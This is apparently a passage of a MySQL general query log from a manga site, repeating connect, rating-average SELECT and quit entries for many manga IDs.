mangauser@localhost on u317079482_mangacherri_2 using Socket 330659637 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '125' order by created desc 330659637 Quit 330659638 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659638 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '37' order by created desc 330659638 Quit 330659639 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659639 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '213' order by created desc 330659639 Quit 330659640 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659640 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '193' order by created desc 330659640 Quit 330659641 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659641 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '86' order by created desc 330659641 Quit 330659642 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659642 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '117' order by created desc 330659642 Quit 330659643 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659643 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '91' order by created desc 330659643 Quit 330659644 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659644 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '307' order by created desc 330659644 Quit 330659645 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659645 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '24' order by created desc 330659645 Quit 330659646 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659646 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '84' order by created desc 330659646 Quit 330659647 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659647 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '243' order by created desc 330659647 Quit 330659648 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659648 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '178' order by created desc 330659648 Quit 330659649 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659649 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '81' order by created desc 330659649 Quit 330659650 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659650 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '191' order by created desc 330659650 Quit 330659651 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659651 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '44' order by created desc 330659651 Quit 330659652 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659652 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '15' order by created desc 330659652 Quit 330659653 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659653 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '116' order by created desc 330659653 Quit 330659654 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659654 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '62' order by created desc 330659654 Quit 330659655 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659655 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '103' order by created desc 330659655 Quit 330659656 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659656 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '109' order by created desc 330659656 Quit 330659657 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659657 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '14' order by created desc 330659657 Quit 330659658 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659658 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '42' order by created desc 330659658 Quit 330659659 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659659 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '257' order by created desc 330659659 Quit 330659660 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659660 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '324' order by created desc 330659660 Quit 330659661 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659661 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '201' order by created desc 330659661 Quit 330659662 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659662 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '120' order by created desc 330659662 Quit 330659663 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659663 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '10' order by created desc 330659663 Quit 330659664 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659664 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '2' order by created desc 330659664 Quit 330659665 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659665 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '198' order by created desc 330659665 Quit 330659666 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659666 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '16' order by created desc 330659666 Quit 330659667 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659667 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '261' order by created desc 330659667 Quit 330659668 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659668 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '203' order by created desc 330659668 Quit 330659669 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659669 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '338' order by created desc 330659669 Quit 330659670 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659670 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '271' order by created desc 330659670 Quit 330659671 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659671 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '237' order by created desc 330659671 Quit 330659672 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659672 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '224' order by created desc 330659672 Quit 330659673 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659673 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '53' order by created desc 330659673 Quit 330659674 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659674 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '231' order by created desc 330659674 Quit 330659675 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659675 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '100' order by created desc 330659675 Quit 330659676 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659676 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '293' order by created desc 330659676 Quit 330659677 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659677 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '107' order by created desc 330659677 Quit 330659678 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659678 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '241' order by created desc 330659678 Quit 330659679 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659679 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '312' order by created desc 330659679 Quit 330659680 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659680 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '181' order by created desc 330659680 Quit 330659681 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659681 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '126' order by created desc 330659681 Quit 330659682 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659682 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '20' order by created desc 330659682 Quit 330659683 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659683 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '234' order by created desc 330659683 Quit 330659684 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659684 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '18' order by created desc 330659684 Quit 330659685 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659685 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '122' order by created desc 330659685 Quit 330659686 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659686 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '190' order by created desc 330659686 Quit 330659687 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659687 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '227' order by created desc 330659687 Quit 330659688 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659688 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '284' order by created desc 330659688 Quit 330659689 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659689 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '322' order by created desc 330659689 Quit 330659690 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659690 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '123' order by created desc 330659690 Quit 330659691 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659691 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '196' order by created desc 330659691 Quit 330659692 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659692 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '308' order by created desc 330659692 Quit 330659693 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659693 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '266' order by created desc 330659693 Quit 330659694 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659694 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '226' order by created desc 330659694 Quit 330659695 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659695 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '11' order by created desc 330659695 Quit 330659696 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659696 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '219' order by created desc 330659696 Quit 330659697 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659697 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '72' order by created desc 330659697 Quit 330659698 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659698 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '292' order by created desc 330659698 Quit 330659699 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659699 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '34' order by created desc 330659699 Quit 330659700 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659700 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '221' order by created desc 330659700 Quit 330659701 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659701 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '174' order by created desc 330659701 Quit 330659702 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659702 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '209' order by created desc 330659702 Quit 330659703 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659703 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '222' order by created desc 330659703 Quit 330659704 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659704 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '251' order by created desc 330659704 Quit 330659705 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659705 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '194' order by created desc 330659705 Quit 330659706 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659706 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '327' order by created desc 330659706 Quit 330659707 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659707 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '119' order by created desc 330659707 Quit 330659708 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659708 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '298' order by created desc 330659708 Quit 330659709 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659709 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '65' order by created desc 330659709 Quit 330659710 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659710 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '200' order by created desc 330659710 Quit 330659711 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659711 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '187' order by created desc 330659711 Quit 330659712 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659712 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '185' order by created desc 330659712 Quit 330659713 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659713 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '311' order by created desc 330659713 Quit 330659714 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659714 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '184' order by created desc 330659714 Quit 330659715 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659715 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '235' order by created desc 330659715 Quit 330659716 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659716 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '242' order by created desc 330659716 Quit 330659717 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659717 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '331' order by created desc 330659717 Quit 330659718 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659718 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '211' order by created desc 330659718 Quit 330659719 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659719 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '176' order by created desc 330659719 Quit 330659720 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659720 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '321' order by created desc 330659720 Quit 330659721 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659721 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '339' order by created desc 330659721 Quit 330659722 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659722 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '183' order by created desc 330659722 Quit 330659723 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659723 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '220' order by created desc 330659723 Quit 330659724 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659724 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '349' order by created desc 330659724 Quit 330659725 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659725 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '3' order by created desc 330659725 Quit 330659726 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659726 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '249' order by created desc 330659726 Quit 330659727 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659727 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '246' order by created desc 330659727 Quit 330659728 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659728 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '215' order by created desc 330659728 Quit 330659729 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659729 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '275' order by created desc 330659729 Quit 330659730 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659730 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '287' order by created desc 330659730 Quit 330659731 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659731 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '195' order by created desc 330659731 Quit 330659732 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659732 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '212' order by created desc 330659732 Quit 330659733 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659733 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '280' order by created desc 330659733 Quit 330659734 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659734 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '278' order by created desc 330659734 Quit 330659735 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659735 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '330' order by created desc 330659735 Quit 330659736 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659736 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '229' order by created desc 330659736 Quit 330659737 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659737 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '186' order by created desc 330659737 Quit 330659738 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659738 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '326' order by created desc 330659738 Quit 330659739 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659739 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '256' order by created desc 330659739 Quit 330659740 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659740 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '270' order by created desc 330659740 Quit 330659741 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659741 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '114' order by created desc 330659741 Quit 330659742 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659742 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '294' order by created desc 330659742 Quit 330659743 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659743 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '276' order by created desc 330659743 Quit 330659744 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659744 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '320' order by created desc 330659744 Quit 330659745 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659745 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '250' order by created desc 330659745 Quit 330659746 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659746 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '216' order by created desc 330659746 Quit 330659747 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659747 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '277' order by created desc 330659747 Quit 330659748 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659748 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '236' order by created desc 330659748 Quit 330659749 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659749 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '358' order by created desc 330659749 Quit 330659750 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659750 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '188' order by created desc 330659750 Quit 330659751 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659751 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '272' order by created desc 330659751 Quit 330659752 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659752 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '118' order by created desc 330659752 Quit 330659753 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659753 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '262' order by created desc 330659753 Quit 330659754 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659754 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '28' order by created desc 330659754 Quit 330659755 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659755 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '371' order by created desc 330659755 Quit 330659756 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659756 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '281' order by created desc 330659756 Quit 330659757 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659757 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '254' order by created desc 330659757 Quit 330659758 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659758 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '323' order by created desc 330659758 Quit 330659759 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659759 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '328' order by created desc 330659759 Quit 330659760 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659760 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '361' order by created desc 330659760 Quit 330659761 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659761 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '238' order by created desc 330659761 Quit 330659762 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659762 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '347' order by created desc 330659762 Quit 330659763 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659763 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '1' order by created desc 330659763 Quit 330659764 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659764 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '286' order by created desc 330659764 Quit 330659765 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659765 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '255' order by created desc 330659765 Quit 330659766 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659766 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '372' order by created desc 330659766 Quit 330659767 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659767 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '315' order by created desc 330659767 Quit 330659768 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659768 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '189' order by created desc 330659768 Quit 330659769 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659769 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '313' order by created desc 330659769 Quit 330659770 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659770 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '325' order by created desc 330659770 Quit 330659771 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659771 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '260' order by created desc 330659771 Quit 330659772 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659772 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '348' order by created desc 330659772 Quit 330659773 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659773 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '285' order by created desc 330659773 Quit 330659774 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659774 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '319' order by created desc 330659774 Quit 330659775 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659775 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '306' order by created desc 330659775 Quit 330659776 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659776 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '283' order by created desc 330659776 Quit 330659777 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659777 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '355' order by created desc 330659777 Quit 330659778 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659778 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '342' order by created desc 330659778 Quit 330659779 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659779 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '264' order by created desc 330659779 Quit 330659780 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659780 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '302' order by created desc 330659780 Quit 330659781 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659781 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '182' order by created desc 330659781 Quit 330659782 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659782 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '274' order by created desc 330659782 Quit 330659783 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659783 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '329' order by created desc 330659783 Quit 330659784 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659784 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '279' order by created desc 330659784 Quit 330659785 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659785 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '314' order by created desc 330659785 Quit 330659786 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659786 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '332' order by created desc 330659786 Quit 330659787 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659787 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '351' order by created desc 330659787 Quit 330659788 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659788 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '289' order by created desc 330659788 Quit 330659789 Connect mangauser@localhost on u317079482_mangacherri_2 using Socket 330659789 Query select count(id) as total_rating, (sum(rating) / count(id)) as average_rating FROM ratings where manga_id = '343' order by created desc 330659789 Quit 330659790 Connect 